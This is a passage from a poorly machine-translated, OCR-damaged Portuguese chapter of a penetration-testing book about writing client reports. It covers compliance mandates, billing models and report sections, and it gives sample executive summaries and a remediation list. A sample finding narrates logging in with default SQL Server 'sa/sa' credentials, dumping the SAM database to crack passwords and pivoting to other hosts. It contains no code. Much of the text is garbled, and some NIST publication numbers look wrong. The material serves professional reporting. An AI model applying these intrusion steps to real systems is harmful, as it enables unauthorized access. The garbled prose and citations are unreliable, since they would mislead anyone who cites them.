suas conclusões são apresentadas. A razão número um relatórios de teste de penetração falhar 
é má gramática ou ortografia. O número dois é motivo de fluxo ou estilos ilógico. Que 

E por isso que é altamente recomendável ter o seu relatório revisado com indivíduos não 
relacionado com o seu projeto para fornecer uma perspectiva outsider. Isto pode incluir ter 
colaboradores que não são técnicos. 


Penetration Test Relatório Executivo 


Como você apresentar resultados será o fator mais influente e determinante 

para futuros negócios. Uma vez que você se familiarizar com um estilo de escrita, há mais 
estilos e fluxos adequados associados com auditorias técnicas. Isto inclui a indústria 

normas que vêm de organizações específicas PCI e outro setor, como 

COBIT eo ITIL. Em última análise, o tema de seu relatório seguirá o aceite 

padrões de governança corporativa para a organização que você está auditando. Além disso, 
mantenha 

em mente que um relatório penetração será visto por muitas pessoas, e referiu-se por um 
período mais longo de tempo do que você provavelmente pretendia. 


Os clientes querem saber como eles são vulneráveis, e os requisitos para corrigir falhas 

para que eles reduzam o risco global de segurança contra ataques. Formatação e tom de 

um relatório pode causar uma reação positiva ou negativa aos dados. Os trabalhos podem ser 
rescindido 

por ter sido ligado a uma vulnerabilidade. Em contrário, uma lacuna crítica na segurança poderia ser 
ignorado se a linguagem de um relatório não corretamente destacar como essencial uma correção é 
necessário. Os melhores prestadores de serviços pode equilibrar as competências técnicas e de 
negócios 

no desenvolvimento de relatórios executivos para que o resultado final terá um impacto positivo 
liderança e equipe técnica. 

Um bom ponto de partida é olhar para o que os regulamentos, normas e mandatos são 

importante para o seu cliente. Misturando os requisitos do cliente solicitado com a indústria 
mandatos é o primeiro tópico deste capítulo. Em seguida, vamos olhar para o serviço diferente 
modelos utilizados para cobrar por serviços de entrega. Depois disso, vamos nos concentrar em 
diferentes 

tipos de documentos, formatação de relatórios executivos para que você possa deixar o bom 
engajamento pós impressão serviço. Este capítulo será concluído com alguns exemplos 

relatórios e cobrir as ferramentas de relatórios restantes disponíveis em Kali Linux. 


Observância 


Os clientes têm orçamentos limitados e, normalmente, a segurança não é um gasto superior 
objetivo em relação a compra pró-ativa. Em nossa experiência, os clientes gastarão 

dinheiro em outras áreas de tecnologia até que algo ruim acontece causando reativa 

gastos. Torna-se ainda mais desafiador para oferecer serviços que avaliam existente 

segurança, como um teste de penetração quando muitos clientes têm problemas suficientes 
manutenção da engrenagem existente, bem como manter-se com a mais recente tecnologia. Um 
simples 

analogia é quando a maioria das pessoas compra um laptop, eles olham para o software para instalar 
para a funcionalidade em vez de defesa (ou seja, a compra de Microsoft Word, em vez 

do que um antivírus). Quando esse mesmo laptop é infectado, os usuários parar de pensar 
software sobre funcional e priorizar a obtenção de software de segurança para remover o 
aplicativo malicioso. 


[278] 


Capítulo 8 


Um método para elevar os seus serviços para o topo da lista de prioridade de compra é 

alinhando com mandatos de negócios. Os clientes são mais propensos a comprar serviços 
cumprimento das obrigações empresariais, tornando a conversa investimento mais fácil de justificar. 
Muitos mandatos do setor têm graves repercussões para não auditorias que vão 

de multas a terminação do trabalho. Alinhando suas entregas com as normas obrigatórias 

é uma opção forte para justificar a aquisição de seus serviços. 


Termos que são importantes em relação ao cumprimento da indústria são as seguintes: 


e As linhas de base: Eles são usados para criar um nível mínimo de segurança necessário 
atender às exigências políticas. As linhas de base pode ser configurações, arquiteturas, ou 
procedimentos que podem ou não refletem o processo de negócio, mas pode ser 
adaptado para atender a essas exigências. Você pode usar linhas de base como uma 
abstração 
para desenvolver padrões. 


e Padrões: São requisitos obrigatórios que suportam de nivel superior 
políticas. Um padrão pode exigir a utilização de uma tecnologia específica incluindo 
marca, produto e protocolo. Um exemplo é a criação de um padrão para 802.1x 
usando o Cisco Identity Services Engine a partir de uma linha de base de ter que ter uma 
forma 
automatizado de controle de acesso. 


* Diretrizes: São recomendações em vez do que o necessário. Considerar 
diretrizes semelhantes às normas, no entanto, nada obriga as pessoas a seguir 
los. Um exemplo é o controle que portas abrir em um firewall, em vez de 
usando a permitir que todos regra de tráfego. 


Os padrões da indústria 


Há muitos padrões importantes da indústria que seus clientes estão mandatados para 
seguir. A lista a seguir é comumente usado para justificar a aquisição de financiamento para 
produtos e serviços: 


e Seguro de Saúde Portabilidade e Accountability Act (HIPAA): Requer 
que controles adequados são postas em prática para garantir as operações de cuidados de 
saúde 
e sistemas de informação administrativos proteger individualmente identificáveis 
informações de saúde eletrônico. Há um baixo risco de multas associadas a 
HIPAA não conformidade, no entanto, os riscos colaterais significativos, como 
responsabilidade civil e marca dano pode resultar de não cumprir HIPPA 
requisitos. 


* Federal Information Processing Standards (FIPS): São computadores nos EUA 
normas de segurança desenvolvidas para proteger a informação transmitida por 
agências governamentais e prestadores de serviços. 
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e Lei de Gestão de Segurança da Informação Federal (FISMA) / Nacional 
Instituto de Padrões e Tecnologia (NIST): A FISMA e NIST especial 
800-153 e 800-137 publicações fornecer um quadro abrangente para 
garantir a eficácia dos controles de segurança da informação sobre os recursos 
que suportam as operações e ativos federais. 


e North American Electric Reliability Corporação (NERC): Desenvolveu 
obrigatório Protecção das Infra- (CIP), normas de segurança cibernética 
para proteger os cibernéticos ativos essenciais que controlam ou afetam a confiabilidade do 
Sistemas elétricos em massa norte-americano. Aprovado pelo Energia Federal 
Comissão Reguladora (FERC), o cumprimento destes padrões é 
obrigatório para todas as organizações envolvidas com a granel do país elétrica 
rede. 


* Payment Card Industry Data Security Standard (PCI DSS) e Pagamento 
Aplicação de Segurança de Dados Padrão (PA-DSS): Estas são as normas para 
organizações que lidam com informações do titular do cartão para o débito principal, de 
crédito, 
pré-pago, e-bolsa, ATM e cartões de POS. 

e Lei Sarbanes-Oxley (SOX): Ele exige reformas rigorosas para melhorar financeiro 
divulgações de empresas e evitar a fraude contábil. 


Serviços profissionais 


As estratégias mais comuns para cobrar os clientes para os serviços são Turnkey e hora e 
Relevante. Turnkey, todos os serviços têm um custo conjunto que só pode ajustar se os serviços 
são solicitados fora do acordado escopo do trabalho. Normalmente, modificações para um 
Engajamento Turnkey exigem um pedido separado para a mudança que o cliente deve 

aceitar antes da inclusão cobrança adicional. 


Serviços Turnkey colocar o risco de perder a rentabilidade do fornecedor de serviços, porque 

custo não ajusta independentemente da quantidade de trabalho necessária para atender o escopo 
de 

trabalho. Isto significa que o prestador de serviços tem a oportunidade de executar tarefas sob 
tempo proposto igualando lucro adicional. Isso também poderia sair pela culatra quando os serviços 
exceder o custo do trabalho. E por isso que é absolutamente essencial para definir um realizáveis 
escopo de trabalho para os serviços propostos, com algumas horas de preenchimento adicionais 
utilizados para 

incidentes imprevistos. 
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Os clientes tendem a inclinar-se para serviços chave na mão com base na capacidade de planejar 
para os custos esperados. Os clientes podem concentrar-se em atingir os resultados esperados da 
serviços solicitados e prestadores de serviços espera quando responsável tarefas não são 
completou, sem incorrer em custos de trabalho adicionais. Grandes organizações, como os EUA 
governo federal são conhecidos por solicitar serviços Turnkey em formais Pedidos 

para saber o Preço (RFP) postagens públicas. Na maioria das situações, há orientações escritas 
pelo escritório de compras para determinar quem será concedido o engajamento baseado 

de fatores como melhor valor, preço e itens de reunião necessário. Vimos RFPs 

sair pela culatra quando o escritório de compras seleciona serviços baseados exclusivamente em 
melhor preço. Em 

Nalguns casos, os serviços de maus causar mais problemas do custo e várias vezes mais altas 
para remediar do que a oferta de melhor valor anterior. Para ajudar os clientes a evitar este 
situação, recomendamos trabalhar com os clientes sobre como solicitar condições específicas 

e condições que apenas candidatos qualificados poderiam se encontrar, para forçar um equilíbrio de 
melhor 

valor e custo como uma métrica de premiação. 


O outro método comum de serviços de faturamento é tempo e materiais. Tempo e 

Propostas Materiais cobrar por horas de utilização. Normalmente, os prestadores de serviços irá 
listar 

diferentes preços por hora para as categorias de faturamento, tais como Gerente de Projetos 
pode ser 100 : 

dólares por hora, mas um engenheiro sênior é de 200 dólares por hora. E comum que 

serviços a serem divididos em ordens de serviço com horas esperados para ajudar o cliente 


preparar se para os encargos previstos, o projeto continua. 
ime and Materials coloca o risco de serviços de alto custo para o cliente, porque 


serviços que superem as ordens de serviço continuam a ser cobrado. O benefício para os clientes é 
eles podem ser capazes de gastar menos, se eles podem possuir parte do trabalho, bem como evitar 
a 

horas de enchimento extras comuns acusados de uma proposta Turnkey. A desvantagem para 
clientes é o prestador de serviços não é incentivado a terminar o projeto e poderia 

atrasar a conclusão. 


Como um profissional prestador de serviços, recomenda-se a apontar para o desenvolvimento de 
um 
Serviços Turnkey oferta como você construir uma prática. Práticas bem definidos pode definir 
expectativas adequadas com clientes para evitar nos serviços de escopo esperado. No nosso 
experiência, os clientes não têm talões de cheques em branco para os serviços, e desejo um 
conjunto 
custar antes de solicitar para o orçamento. 
Periodicamente, os clientes podem solicitar para substituir membros faturáveis com a su 
pessoal para reduzir o custo total do projeto. Por exemplo, um cliente pode pedir para 
. usar um gerente de projeto interno para o planejamento. Este introduz o risco de 
ao não gerir adequadamente os recursos, o que poderia levar a problemas e causa 
Qe horas excessivas que vai comer fora em lucros esperados. Recomendamos 
evitar estas situações, porque é difícil de controlar um membro da equipe 
que não é diretamente parte de sua organização. 
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Documentação 


O desenvolvimento de um produto final pode ser dividida em alguns estágios, tal como mostrado no 
seguinte 

diagrama. O primeiro estágio é o Projeto de Revisão. Este é o lugar onde o prestador de serviços 
comentários 

a declaração de trabalho, objetivos de negócio do cliente, áreas de interesse, e propôs 

valor para fornecer. Tudo isso mais o material identificado adicional é usado para construir um 


odelo de relatório. ae a 
Õ próximo passo é o preenchimento do modelo de relatório durante a fase de Coleta de Informações. 


A informação capturada inclui dispositivos identificados, processos utilizados, vulnerabilidades 
encontrado, verificação de vulnerabilidades, sugeriu remediação, e outros dados. 


Uma vez que todos os dados são capturados e alinhado com o modelo, a terceira fase é a preparação 
um primeiro esboço. Este projecto não será voltado para clientes e conter o máximo de dados 
possível. Ultima é a fase de revisão, usada para emagrecer o relatório com os dados mais forte 
juntamente com o ajuste para atender às demandas de negócios de uma forma profissional. Melhores 
práticas 

está a ter tanto um escritor de edição técnica e profissional do projecto para se certificar de que 
endereços tanto necessidades de pessoal técnico e executivo. 


Projeto Informações Primeira V Comente e 
Revisão Coleção E ee finalização 


Um escopo de trabalho deve sempre contabilizar horas necessárias para criar 
documentação. Normalmente 60 por cento do tempo relatório escrita será 
utilizado para o projecto, e revisão de documentos e assinar projeto irá utilizar o 
restantes horas. Certifique-se de calcular o ciclo de vida do documento em sua 
cronograma do projeto, para evitar perda de receita. 


Formato do relatório 


Independentemente do tipo de projeto, há alguns itens que devem ser incluídos 

em serviços de documentos de resultado final. Todos os documentos devem explicar o seu 
propósito, 

anunciar a sua marca, identificar as partes envolvidas, o trabalho lista que foi realizada, e 
Concluo com um resultado esperado. Esta seção irá fornecer algumas dicas e 

exemplos para o cumprimento das metas de formatação de uma forma profissional. 
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Capa 


A página de rosto em um mínimo irá fornecer um nome de relatório, versão, data, autor, serviço 
nome do fornecedor, eo partido pretendia. As folhas de rosto também pode listar os itens adicionais, 
tais 

como a classificação de segurança de documentos ou de destaque os resultados de outras seções. 


Declaração de Confidencialidade 


As informações obtidas durante a maioria dos serviços de penetração será 

sensível. E fundamental para identificar o nível de segurança esperado para proteger informações 
capturados durante o trabalho, bem como o nome que é permitido para ver como 

dados. Certos níveis de folga pode exigir tratamento especial ou em locais protegidos 

para o armazenamento, tais como um Sensitive Information Facility Compartmented (SCIF) para 
armazenamento de material classificado. Violações de privacidade de dados pode ter financeira, 
marca e 

repercussões legais. 


Uma declaração de confidencialidade deve explicar qual o nível de segurança está envolvido com 
o documento, que está autorizado a vê-lo, o que é eo que não é permitido 

ser copiado, os direitos de distribuição, e outra linguagem jurídica. Recomendamos que você tenha 
um indivíduo com um fundo legal desenvolver a sua confidencialidade padrão 

Declaração. 


Exemplo 1: Declaração de Confidencialidade 


Este documento contém informações confidenciais e privilegiadas do serviço 

FORNECEDOR. A informação é destinado para uso privado do cliente para a sua 
compreensão do estado atual da segurança da sua organização. Ao aceitar 

Neste documento, O CLIENTE concorda em manter o conteúdo deste documento em 
confiança e não copiar, divulgar, ou distribuí-lo para todas as partes, excepto os 

que irá fornecer serviços e / ou produtos diretamente aos clientes, como resultado de 

as recomendações deste documento, sem pedido por escrito para e por escrito 

confirmação do serviço de provedor. Se você não for o destinatário pretendido, ser 

ciente de que qualquer divulgação, cópia ou distribuição deste documento ou de suas partes é 
proibida. 


Exemplo 2: Declaração de Confidencialidade 


Esta informação confidencial está sendo fornecido ao PRESTADOR DE SERVIÇOS como 
entrega deste trabalho de consultoria. O único propósito deste documento é 

fornecer ao cliente com os resultados e recomendações deste compromisso. 

Cada destinatário concorda que eles vão seguir as restrições de distribuição de acordo com a 
o acordo entre este agente consultoria e prestador de serviços. 
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Controle de documentos 


É importante listar qual a versão e edições são feitas a uma proposta de entrega. 
Provavelmente, muitas pessoas com uma variedade de conjuntos de habilidades irá rever um 
documento. 

Mudanças de rotulagem com as datas e tipo de modificação vai ajudar os leitores alavancar o 
versões mais recentes. 


ES RR [| 


Timeline 


Timelines fornecer uma estimativa de horas para cada fase de um projeto. Timelines deve 
incluir o nome de fase, tarefas a serem concluídas, e duração prevista para essa fase. 
Normalmente, a duração é exibido em horas faturáveis para que o cliente pode estimar o 
custo para cada fase do projeto. Recomenda-se a incluir a língua para a qual 

fases são obrigatórias para evitar pedidos para remover as fases críticas, como o projeto 
kickoff. 


Veja a seguir um cronograma estimado e plano de implementação de alto nível: 


Rrovider Serviço começará este compromisso de iniciar duas semanas depois de receber o 
assinado declaração de trabalho (SOW), e da ordem de compra do cliente sujeita a recurso 
disponibilidade. Se o cliente solicita um compromisso data de início acelerado, este deve 
ser negociado com Provedor de Serviços, Gerenciamento de Projetos, e conta Team. 


As fases de apresentação da fase de lançamento do projeto e remediação são fases obrigatórias 
para todas as outras fases. 
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Fase Engagement Tarefa (nível alto) Duração Estimada 


Projeto Kickoff Meeting Demonstração do trabalho de revisão. 
Configuração Deliverable. Negócio 
e Q técnico + A, Boundry revisão. 
Pré-requists 
8 Horas 


Avaliação de Rede Ferramenta de preparação e instalação. 


Footprinting, revisão de políticas, 


mapeamento. 
P 16 Horas 


Digitalizar para dispositivo. Revisão existente 
infra-estrutura de rede 32 Horas 


Teste de Invasão Sistema que pode ser identificar 
explorados e executar teste caneta sobre 


sistemas de destino. 
32 Horas 


Análise de relatórios, recomendações 


e apresentações 16 Horas 


Remediação Apresentação Constatação atual e impacto de segurança 
análise, incluindo recomendações R 

6 Horas 

Projeto fechar 


2 Horas 


Resumo executivo 


O objetivo de um relatório executivo é fornecer uma visão geral de alto nível de serviços por que 
Foram realizados. Os resumos executivos deve cobrir o que o levou até a questão ser 
abordados, a situação problemática, e proposta de solução com resultados esperados. 
Relatórios executivos não exigem detalhes técnicos e devem visar a liderança, em vez 

de pessoal técnico. 


Exemplo 1: Sumário Executivo 
Background: 


CLIENTE envolvidos PRESTADOR DE SERVIÇOS para realizar uma avaliação de vulnerabilidade 
e teste de penetração de seus sistemas. A finalidade do acoplamento foi avaliar o 

segurança das redes e sistemas de clientes, identificando possíveis falhas de segurança 

neles, utilizando comprovada metodologia de testes SERVIÇO do provedor. O projeto 

foi realizada em um número de sistemas em segmentos de rede do cliente, um 

equipe de especialistas do provedor de serviço durante a data de admissão. 
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Este projeto incluiu testes de penetração de nove (9) os hosts internos. Para o teste, 
PRESTADOR DE SERVIÇOS focada no seguinte: 


e Tente determinar o que as vulnerabilidades de nível de sistema poderia ser descoberto 
e explorados sem o conhecimento prévio do ambiente ou notificação ao 
administradores. 


e Tentar explorar vulnerabilidades encontradas e acesso a informação confidencial 
que podem ser armazenados em sistemas. 


e Documentos e relatório sobre todos os achados. 


Todos os testes levaram em consideração os processos de negócios reais implementadas pelo 
sistemas e suas ameaças em potencial e, portanto, os resultados desta avaliação refletem uma 
imagem realista dos níveis reais de exposição a hackers online. 


Este documento contém os resultados dessa avaliação. 
Informações sobre o projeto: 


O principal objetivo desta avaliação foi o de fornecer uma análise de segurança 
falhas presentes em redes e sistemas do cliente. Esta avaliação 

foi realizado para identificar possíveis vulnerabilidades e fornecer acionável 
recomendações sobre remediar as vulnerabilidades para fornecer uma maior 
nível de segurança para o meio ambiente. 


PRESTADOR DE SERVIÇOS usado sua metodologia Teste de Invasão provado 
avaliar a segurança dos sistemas e identificar potenciais falhas de segurança. 


Exemplo 2: Sumário Executivo 


PRESTADOR DE SERVIÇOS AO CLIENTE empenhado para realizar uma penetração da rede 
Teste em um número quantificado de sistemas em sua rede. Estes sistemas foram 
identificados pelos números de host 192.168.1.x, 10.1.1.x, e 172.16.1.X. A finalidade 

desse compromisso foi o de identificar e priorizar as vulnerabilidades de segurança no 
sistemas identificados. O engajamento foi lançada em [START DATE] e incluiu 

quatro (4) dias de testes, análise e documentação. 


Metodologia 


É altamente recomendável para fornecer uma visão geral de como você entregar serviços. 
Destaques deve incluir o seu processo para cada fase de um noivado, ferramentas 

usado, e como você lida com as ameaças identificadas. E comum para desenvolver diagramas 
apresentando fluxo de processos e estruturas de relatórios de recursos para esta seção. 
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As certificações podem ajudar a mostrar a capacidade de um provedor de serviços para proporcionar 
qualidade 

resultados. Existem certificações que destacam a capacidade da empresa de seguir comprovada 
metodologia de fluxo de negócios, tais como a Organização Internacional para 

Normas certificações (ISO) (Por exemplo, ISO 9001 ou 14001). Outras certificações 

poderia ser focado em uma tecnologia específica, como tendo engenheiros certificados para 

instalar a tecnologia que está sendo solicitado. Certificações de testes de penetração são Popular 

o Certified Ethical Hacker (CEH) e GIAC Penetration Tester (GPEN), que 

ajudar a qualificar os recursos que estão sendo contratados. 


Por Exemplo: Metodologia 


PRESTADOR DE SERVIÇOS usado personalizado e ferramentas disponíveis publicamente para 
ganhar perspectiva de 

postura de segurança da rede do ponto de vista de um hacker. Estes métodos proporcionam 
CLIENTE com uma compreensão dos riscos que ameaçam a sua informação, e 

também os pontos fortes e fracos de seus controles atuais protegendo esses sistemas. 

Os resultados foram alcançados e exigido pelo perfil de redes internas CLIENTE 

usando informações publicamente disponíveis, o mapeamento da arquitetura de rede, identificando 
hosts e serviços, rede enumerando e vulnerabilidades de nível de sistema, 

descobrindo anfitriões inesperados dentro do ambiente e eliminando falso 

positivos que pode ter surgido a partir de digitalização. 


| 


Alvos de mapeamento 


Teste de Invasão 
Metodologia 


Lockdown 
Alvos 
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Procedimentos de teste detalhadas 


Esta seção aborda detalhes do envolvimento de serviços. O público-alvo é 

Normalmente o pessoal técnico, eo objetivo é fornecer o máximo de informações 

possíveis áreas de preocupação em torno identificados. Os clientes podem querer desafiar um 
item realçado e repita os passos utilizados para validar a vulnerabilidade, ou seja, 

eles querem saber como as coisas são descobertas, acessados e explorados. Estes dados 
também verifica todas as áreas de rede solicitados rotulados no âmbito do trabalho ter sido 
enviada pelo prestador de serviço. 


Normalmente, os assuntos a serem incluídos são alvos descoberta, mapeamento, a vulnerabilidade 
avaliação, análise da arquitetura, explorando, e relatórios. Até que ponto um serviço 

provedor vai em qualquer área é baseada no que a declaração de trabalho define como o foco 

do noivado. 


Por exemplo, 


PRESTADOR DE SERVIÇOS foi capaz de acessar o host legado EMR usando o padrão 
credenciais de administrador do sistema para MS SQL. Esse acesso nos permitiu criar um 

conta de administrador, expor os processos do sistema, contas de usuário, arquivos de banco de 
dados e 

permitir a transferência e execução de arquivos. Um invasor com este nível de acesso seria 

ser capaz de interromper todos os processos de negócios que dependem desse host. 


PRESTADOR DE SERVIÇOS também foi capaz de usar o Server Message Block (SMB) Null 
Conta de usuário para enumerar os nomes de contas de usuários e grupos do nome de domínio 
Server (DNS). Um invasor pode usar esta informação para ataques de phishing direcionados 
sobre os trabalhadores do cliente ou para conduzir ataques de adivinhação de senhas força bruta. 
Um atacante que ganha credenciais administrativas com sucesso para criar outro usuário 

contas e atribuí-los a atingir as funções corporativas poderia usar informações de usuários. 


No geral, os resultados identificar ameaças que podem ser mitigados através de dispositivo simples 
/ 
definições de configuração de software, juntamente com políticas de apoio. 


A avaliação da vulnerabilidade e testes de penetração resumo: 


CLIENTE desde PRESTADOR DE SERVIÇOS com os oito (8) endereços IP são listadas 
na tabela a seguir. Esta gama foi digitalizada para determinar as portas e serviços abertos 
execução nos hosts relacionados. 
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Endereço IP Hostname Portas TCP 


42,53,88,135,139,445,464,53,636,1025,1 
192.168.10.20 SERV001 071,1075,1145 


192.168.10.23 SERV542 135,139,445,1433,3300 
192.168.10.154 SER 135,139,445,1433,3389 
192.168.10.204 SER m7 SY 80,135,139,445,1443 


135,139,445,1433,1434,3372,3389,5022, 
172.18.10.100 SERVSQL123 8400,8402 

135,139,445 ,1433,1434,3372,3389,5022, 
172.18.10.101 SERVSQL124 8400,8402 


Resumo dos resultados 


O Resumo das conclusões é a carne por trás da proposta. Este é o lugar onde os resultados 

dos serviços são explicados, incluindo a forma como os itens identificados podem impactar negócios. 
Como estes resultados são formatados vai determinar a reação do seu cliente, por isso não 
consciente de não só o que é dito, mas também a forma como os dados são apresentados. 


A melhor prática é, incluindo uma classificação de risco para ajudar os clientes a entender como reagir 
aos itens identificados. Características de classificação comum é a probabilidade, avaliação do risco, 
gráficos, esquemas de cores e assim por diante. Recomendamos incluindo tanto um gráfico de resumo 
e seção detalhada sobre todos os itens identificados individualmente. Para fazer backup de suas 
descobertas, 

melhor prática é ter referências a fontes públicas sobre por que o ativo identificado tem uma 

questão para validar ainda mais a sua reivindicação. As fontes públicas poderia ser violações em 
conformidade, 

não encontrando um padrão mandatada ou explicação de uma vulnerabilidade conhecida de um 

fonte respeitável. 

Exemplo: 


* Crítico: Ameaça imediata para os processos-chave de negócios 


e Alta: Ameaça indireta a chave processos de negócio / ameaça de secundário 
processos de negócios 


e Meio: Indireta ameaça / parcial aos processos de negócio 


e Baixa: Não existe nenhuma ameaça direta; vulnerabilidade pode ser alavanca com 
outro 
vulnerabilidades 
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O nível de risco atual de sistemas testados, com base no nível de risco mais elevado dos resultados 
obtidos em 

sistemas é crítico durante o ensaio, um total de um (1) Crítico, dois (2) Médio, e 

dois (2) Baixo vulnerabilidades foram identificadas como mostrado na imagem seguinte: 


Vulnerabilidade À 
Vulnerabilidade D 
Vulnerabilidade E 


Mesa de verão para os resultados da avaliação 
Drgitatização FypeTfota 


Único é definida como o número de diferentes vulnerabilidades encontrado 
E -& dentro de um nivel de risco. Por exemplo, se cinco vulnerabilidades de alto nível fora 
Nisa encontrado, mas três são original, do que algumas das vulnerabilidades são 
x apresentar em mais de um sistema. 


Vulnerabilidades 


Vulnerabilidades encontradas deve incluir uma descrição clara sobre a origem do 

fraqueza, impacto nas operações de negócios e probabilidade de ser explorado. Relatórios 

também deve listar como a vulnerabilidade foi identificada juntamente com, se ele foi validado, 
significado foi a vulnerabilidade explorada ou apenas identificada como uma possível vulnerabilidade 
durante uma verificação. Vulnerabilidades na arquitetura de um cliente pode incluir um diagrama 
explicando o problema com o fluxo de tráfego capturado que os clientes possam qualificar o 
recomendação. 


Alguns detalhes que poderiam ser incluídos para vulnerabilidades identificadas em um relatório de 
entrega 
são como se segue: 

e Nome Vulnerabilidade 


e  Criticidade do negócio 


e Descrição Vulnerabilidade 
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Detalhes técnicos 
Os sistemas afetados 
Portas afetadas 


Ação recomendada 


Vulnerability Name Microsoft SOL Server with Default Credentials 

Vulnerability Description 

The Microsoft SQL Server associated with the Legacy EMR database Is accessible using 
the default credentials “sa/sa”, An attacker can leverage these SQL credentials to gain 
control over the underlying operating system. This access includes the uploading and 
downloading of files, the ability to create/read/write/delete files on the host, and to 
create local user accounts 


Technica! Details 

SERVICE PROVIDER performed a vulnerability scan on host 100.25.5.55 and discovered 
that the MS SQL System administrator (sa) account still had its default password "sa" 
active. The screenshot below shows that SERVICE PROVIDER used thse credentials to 
access the host 


SERVICE PROVIDER proceeded to dump the contents of the SAM database. This 
database is used by Windows NT to store and retrieve user credentials. With this 
information, we could run a rainbow tables or brute-force attack to decipher the 
passwords to all of these accounts. If any of these passwords were the same for other 
systems, we could then hop to other systems and compromise them as well. In order to 
validate that files could be perused by an attacker, SERVICE PROVIDER confirmed that it 
could open a directory shell to the host. 
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Pode haver conclusões gerais que você gostaria de incluir além vulnerável 

sistemas para mostrar valor adicional. Por exemplo, existe uma ordem que toda EUA 
agências federais têm equipamentos capazes de suportar IPv6. Não tendo este não é 
necessariamente uma vulnerabilidade, no entanto, algo que um cliente federal dos EUA seria 
interessado em saber. Outro exemplo seria apoiar as futuras tecnologias, 

tais como capacidades para Voz sobre IP (VolP) e vídeo. 


A seguir está uma lista de sugestões de itens para incluir em serviços de Teste de Penetração de 
mostrar o valor adicional: 


e Diferença em configurações de arranque e de funcionamento para 
° ASRS Sthores praticas 

* Suporte para IPv6 

e Fim de venda ou de final de dispositivos de 

e YE porte para as Capacidades necessarias para VoIP e video 

e | Conformidade com normas comuns, como FISMA, PCI 


e Lista de números de série, endereço IP, MAC, e assim por diante de dispositivos 
ncontrados 
e opologia de rede 


e Protocolos disponíveis e dos dados virado público 


Considerações de rede e de 
recomendações 


Esta seção explica as recomendações para remediar itens encontrados de serviços 
fornecida. Recomendações podem variar de sugestões de alto nível, como "remendo 
este sistema ", a passos muito detalhados para fechar uma vulnerabilidade. Algumas medidas de 
remediação 
poderia afetar outros serviços, como fechar as portas para defender de um ataque específico, 

ue também incapacita outro sistema que utiliza esse canal para comunicação. Ele 
E importante incluir advertências de possíveis impactos negativos com qualquer sugeriram 
remediação, juntamente com a confirmação de que os passos previstos não garantem para corrigir o 
problema ou trazer um sistema em conformidade com a regulamentação específica. A última coisa 
você iria querer é um cliente que está sendo comprometida serviços de correios e ponto culpa 
em você por não fornecer etapas de correção de sucesso para uma vulnerabilidade identificada 
durante seus serviços. 
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É muito importante afirmar em um relatório que garante entrega 
ou coberturas estão incluídos os serviços de correios. Os clientes que não conseguem 
uma auditoria 
. pode assumir os seus serviços anteriores são responsáveis se você não indicar seu 
q Re serviços, não garantem reunião mandatos ou necessidades específicas. 
SS Por exemplo, existe uma grande diferença entre ter um relatório PCI 
incluído com serviços, em comparação com a contratação de um especialista na verdafle 
PCI 
na revisão de todos os aspectos do regulamento com a rede do cliente, 
em um método semelhante ao utilizado pelos auditores. 


Há muitos níveis de remediação. Por vezes, como a rede de arquitectura 

expõe uma fraqueza, mas outras vezes é uma lacuna na política, configuração ou 
remendo faltando. Os itens a incluir, por recomendações são resumo das conclusões, 

de alto nível e detalhadas recomendações para remediação, outros dados úteis 

fora de itens solicitados, tais como as capacidades de IPv6, mudanças no projeto da rede, 
recomendações de hardware, software, patches e resumo cumprimento. 


Exemplo: 


Louvamos ao cliente para ser pró-ativo na gestão de risco de tecnologia e 

segurança da rede por meio de aquisição de nossos serviços. Devido ao impacto da geral 
organização como descoberto por este teste de penetração, os recursos adequados 
recomendado para ser alocada para assegurar que os esforços de reparação são efectuadas 
em tempo hábil. Apesar de uma lista abrangente de itens que devem estar 

implementado está fora do âmbito do presente compromisso, alguns itens de alto nível são 
importante mencionar. 


e | Implementar um programa de gerenciamento de patch: Muitas das vulnerabilidades 
identificadas 


poderiam ser evitados com o gerenciamento de patches adequada. Recomendamos seguinte 
as orientações descritas no NIST SP 800-408 como uma fonte para o desenvolvimento de 
políticas de segurança para gerenciamento de patches adequada. Isto irá reduzir o risco de 
execução de sistemas vulneráveis. 


Impor controle de mudanças em todos os sistemas: As vulnerabilidades comuns são 
causado por erro humano. Muitos problemas de configuração incorreta poderia ser 
evitado 


através de uma mudança forte e processo de controlo em todos os sistemas activos 
Multifatorial Alavancagem e controle de acesso baseado em função: Alguns sistemas 


críticos 

Foram encontrados alavancando a segurança da senha como os únicos meios de validar 
pessoas autorizadas. A melhor prática é ter, pelo menos, duas formas de 

autenticação, juntamente com a limitação do acesso conta de administração. 

Restringir o acesso a sistemas críticos: Sistemas críticos devem ser isolados a partir de 
outros sistemas usando listas brancas, ACLs, VLANs e outros meios. O projeto 

conceito de privilégio mínimo vai limitar a quantidade de dano que um atacante pode 
provocado usando um recurso comprometida. Consulte NIST SP 800-27 RevA11 para 
orientações sobre a obtenção de uma linha de base de segurança para sistemas de TI. 
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* Realizar avaliações de vulnerabilidade regulares: As avaliações de vulnerabilidade 
deve ser realizado numa base regular, como um meio para validar o actual 
estado de risco para a organização. Consulte NIST SP 800-309 para obter orientações 
sobre 
funcionamento de um programa eficaz de gestão de risco. 

e Incluir alta disponibilidade para sistemas críticos e redes: Durante a nossa 
avaliação, encontramos pontos únicos de falha para sistemas de missão crítica. 
A melhor prática é o desenvolvimento de opções de failover em caso de falha na rede. 
Um exemplo para um melhor tráfego para o datacenter do núcleo é a adição de 
sistemas redundantes para a rede de centros de dados, como mostrado abaixo. 


Adicionais de Alta Disponibilidade Equipamento 


Interruptor 


aa 


Data Center 


Interruptor 


Servidores 
Firewall 


Apêndices 


Um listas anexas informações adicionais relacionadas com o relatório entrega tipicamente 
não é essencial para as principais conclusões. Isto é para fins de referência e pode conter 
resultados da verificação, screenshots capturados, e outras informações. 


Exemplo: 
Apêndice 001 - Relatórios de varredura de vulnerabilidades Nessus 


<Captured Nessus Relatório Printout> 


Glossário 


Um glossário é usado para definir o significado dos termos utilizados na proposta. Isso poderia 
ser para definições técnicas, especificando os requisitos atrás conformidade referenciados 
termos, ou outras áreas que podem precisar de mais esclarecimentos. 
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Declaração de Trabalho (SOW) 


Antes de oferecer serviços de penetração, pode ser necessário escrever uma Declaração de Trabalho 
(SOW) que descreve o trabalho que você está indo para executar. Este é normalmente o primeiro 
passo 

você gostaria de completar com seus stakeholders antes de iniciar um projeto. 


Ao escrever um SOW, recomendamos que você siga um formato que acabará 
representar a sua estrutura de comunicação. O formato básico de uma Declaração de 
Trabalho 

documentos incluem o seguinte: 


* Relatório Executivo: Um resumo de alto nível do trabalho que você está fazendo, o que 
você espera realizar, e seu público-alvo .. 


Exemplo de SOW sumário executivo é a seguinte: 


